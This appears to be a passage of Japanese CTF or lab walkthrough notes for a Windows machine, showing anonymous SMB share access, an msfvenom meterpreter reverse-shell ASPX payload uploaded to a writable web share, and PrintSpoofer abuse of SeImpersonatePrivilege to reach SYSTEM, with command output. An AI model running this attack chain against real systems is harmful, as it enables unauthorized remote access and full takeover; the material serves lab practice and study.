user
- smb が開いてるのでこれを起点にする
- enum4linux は動かなかった
- nmap よく見たら windows だった
smbclient -L \\\\ip で使えそうな share を探すnt4wrksv が使えそう- パスワードなしで入れる
- パスワードリストが手に入る
nt4wrksv が書き込み可能なのでリバースシェルを入れる(SMB (Server Message Block) Pentesting - Exploit Notes)
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=ip lport=port -f aspx -o shell.aspsmb: \> put shell.aspxcurl http://10.10.16.163:49663/nt4wrksv/shell.aspx
root
- SeImpersonatePrivilege が使える(Abusing Tokens - HackTricks)
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe を使う
eterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
meterpreter > shell
C:\users\bob\desktop>cd c:/inetpub/wwwroot/nt4wrksv
cd c:/inetpub/wwwroot/nt4wrksv
c:\inetpub\wwwroot\nt4wrksv>dir
dir
Volume in drive C has no label.
Volume Serial Number is AC3C-5CB5
Directory of c:\inetpub\wwwroot\nt4wrksv
03/17/2024 05:50 PM <DIR> .
03/17/2024 05:50 PM <DIR> ..
07/25/2020 08:15 AM 98 passwords.txt
03/17/2024 05:50 PM 27,136 PrintSpoofer64.exe
03/17/2024 05:45 PM 1,020,190 shell.aspx
3 File(s) 1,047,424 bytes
2 Dir(s) 20,277,039,104 bytes free
c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -i -c powershell.exe
PrintSpoofer64.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> cd /users/administrator/desktop
cd /users/administrator/desktop
PS C:\users\administrator\desktop> dir
dir
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/25/2020 8:25 AM 35 root.txt
